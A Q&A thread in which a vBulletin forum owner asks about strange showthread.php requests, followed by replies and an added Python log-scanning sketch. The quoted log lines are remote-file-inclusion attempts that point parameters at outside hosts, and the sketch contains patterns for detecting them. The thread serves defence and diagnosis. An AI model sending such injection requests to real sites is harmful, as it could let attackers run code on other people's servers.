uk1900

asked on

vbulletin security/weird url request!

Hi experts,

For a while my forum has become slower every time I get these types of URLs.
Normally they should request a topic number, for example: (vb/showthread.php?t=987)
but instead they request (vb/showthread.php?t=ANOTHER_WEIRD_URL), as shown in the code option.

My question: does this affect my forum? How can I stop them?

thx



vb/showthread.php?t=http://halloween.fizwig.com/index.htm?
/vb/showthread.php?t=http://schoolpapers.hostinginfive.com/bike.htm?
/vb/showthread.php?t=http://schoolpapers.hostinginfive.com/bike.htm?
/vb/showthread.php?t=http://mattd.myhood.se/bike.htm?
/vb/showthread.php?goto=http://schoolpapers.hostinginfive.com/bike.htm?
/vb/showthread.php?t=3279//modules/xfsection/modify.php?dir_module=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt?????
/vb/showthread.php?t=http://bikelove.hostinginfive.com/bike.htm

ahoffmann

> .. how can I stop them.
i.g. you cannot
Well, you can use a web application firewall to reject/drop such requests.

> .. does this affect my forum?
If your PHP scripts use this parameter unvalidated, then it could affect your forum, your data and/or even your whole system.
uk1900

ASKER

thx ahoffmann


How can I reject/drop a request?
ASKER CERTIFIED SOLUTION
ahoffmann
This solution is only available to members.
They are trying to see if your application is not validating input, and if you have url fopen enabled in PHP they will gain access to your system.
The best solution to block those exploit attempts is to use Apache mod-security. Mod security will successfully block these with the right settings. It's even possible to detect them by user agent, which if not masked is libwww, which is Perl's web agent. Their scripts doing this are usually written in Perl.
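
A log-triage sketch for the requests discussed in this thread, added here as an example and not posted by any participant: it flags `showthread.php` requests whose parameters carry a URL or whose `t` is not a number, and notes a libwww user agent when one accompanies them. It assumes Apache's "combined" log format; the sample lines, hosts and addresses are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format: pull the request URI and the User-Agent field.
LOG_LINE = re.compile(
    r'"(?:GET|POST|HEAD) (?P<uri>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
URL_IN_VALUE = re.compile(r"(?i)(?:https?|ftp)://")
NUMERIC_PARAMS = {"t"}  # thread id; the question shows t=987 as the normal form


def inspect(line):
    """Return the reasons a log line looks like a remote-include probe ([] if none)."""
    m = LOG_LINE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("uri"))
    if not parts.path.endswith("/showthread.php"):
        return []
    reasons = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if URL_IN_VALUE.search(value):
            reasons.append(f"{name}: URL in value")
        elif name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            reasons.append(f"{name}: not a number")
    # libwww alone is weak evidence, so report it only alongside a bad parameter.
    if reasons and "libwww" in m.group("ua").lower():
        reasons.append("user-agent: libwww")
    return reasons


# Constructed sample lines (hosts, addresses and timestamps are placeholders).
_P = '203.0.113.9 - - [01/Jan/2009:10:00:01 +0000] "GET /vb/showthread.php?'
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2009:10:00:00 +0000] '
    '"GET /vb/showthread.php?t=987 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    _P + 't=http://probe.example.invalid/bike.htm? HTTP/1.1" 200 312 "-" "libwww-perl/5.805"',
    _P + 'goto=http://probe.example.invalid/bike.htm? HTTP/1.1" 200 312 "-" "libwww-perl/5.805"',
    _P + 't=3279//modules/xfsection/modify.php?dir_module='
         'http://probe.example.invalid/copyright.txt????? HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    _P + 't=12abc HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(inspect(line) or "ok")
```

The same two conditions (a URL scheme inside a parameter value, a non-numeric `t`) are what a web application firewall rule or an input check in the script itself would test before the request reaches the forum code.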